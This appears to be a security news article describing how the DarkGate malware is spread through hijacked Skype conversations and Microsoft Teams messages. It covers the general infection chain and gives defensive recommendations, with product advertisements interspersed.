Hackers utilized the Teams and Skype messaging platforms to spread the DarkGate malware to the targeted businesses. When DarkGate malware is installed, a Visual Basic for Applications (VBA) loader script is delivered to victims.
The Windows-based malware known as DARKGATE is capable of remote access to target endpoints, file encryption, cryptocurrency mining, and credential theft. It was initially made public in 2018.
According to Trend Micro, darkGate attacks were spotted in the Americas, followed closely by those in Asia, the Middle East, and Africa.
Implementing AI-Powered Email security solutions “Trustifi” can secure your business from today’s most dangerous email threats, such as Email Tracking, Blocking, Modifying, Phishing, Account Take Over, Business Email Compromise, Malware & Ransomware
To deploy and carry out its illicit capabilities, DarkGate also uses the automation and scripting tool AutoIt, which is designed for Windows. AutoIt is a genuine tool, but other malware families commonly utilize it to get through defenses and add an extra layer of obfuscation.
DarkGateInfection Chain Abusing Skype
The attacker simply utilized the hijacked Skype account to hijack an existing conversation thread and send a message that looked like a PDF file but was a malicious VBS script.
“The threat actor abused a trusted relationship between the two organizations to deceive the recipient into executing the attached VBA script”, researchers said.
Hence, the recipient recognized the sender as a member of a reliable external source. Researchers observed that the curl command, in this case, was used to retrieve the legitimate AutoIt application and the associated malicious files.
Hackers Abusing Microsoft Teams Platform
Another instance included a threat delivering a link through a Microsoft Teams message. In this instance, the victim was exposed to the possibility of spam since the organization’s technology lets them receive notifications from outside users.
The attackers concealed a.LNK file in the Teams version of the breach. Additionally, an unidentified external sender sent the sample that abused Teams.
“The downloaded artifacts contained both legitimate copy of AutoIt and a maliciously compiled AutoIt script file that contained the malicious capabilities of DarkGate,” researchers said.
Recommendation
Cybercriminals may use these payloads to spread malware, such as cryptocurrency miners, info stealers, ransomware, malicious and/or abusive remote management tools, and ransomware.
The organization should have control over instant messaging applications so that regulations like prohibiting external domains, limiting attachments, and, if practical, adopting scanning may be enforced.
If legitimate credentials are compromised, multifactor authentication (MFA) is strongly advised for securing apps. This reduces the threat of attacks utilizing these methods spreading.
Protect yourself from vulnerabilities using Patch Manager Plus to patch over 850 third-party applications quickly. Take advantage of the free trial to ensure 100% security.